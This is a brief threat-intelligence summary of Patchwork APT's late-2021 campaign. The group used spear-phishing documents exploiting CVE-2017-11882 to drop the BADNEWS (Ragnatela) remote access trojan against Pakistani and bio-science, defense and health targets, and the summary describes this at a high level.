Patchwork APT

Industry: Bio-Science, Defense & Health | Level: Tactical | Source: Malwarebytes

Threat activity from late November to early December 2021, associated with Patchwork APT an Indian threat actor, has been shared by Malwarebytes. The group's initial access tactics involve spear-phishing with malicious documents attempting to take advantage of CVE-2017-11882, equation editor vulnerability in order to drop new remote access trojan - BADNEWS (Ragnatela). The RAT's capabilities include CMD command execution, capturing screenshots, logging keystrokes, collecting file lists, collecting running processes, downloading additional payloads, and uploading files. The research shared was provided in part due to mistakes made by the threat actor in infecting themselves. The threat actor has been active since December 2015 and including their latest campaign, they have largely targeted Pakistan entities with some recently impacted in industries for Bio-Science, Defense, and Health.

• Anvilogic Use Case: Abuse EQNEDT32.EXE CVE-2017-11882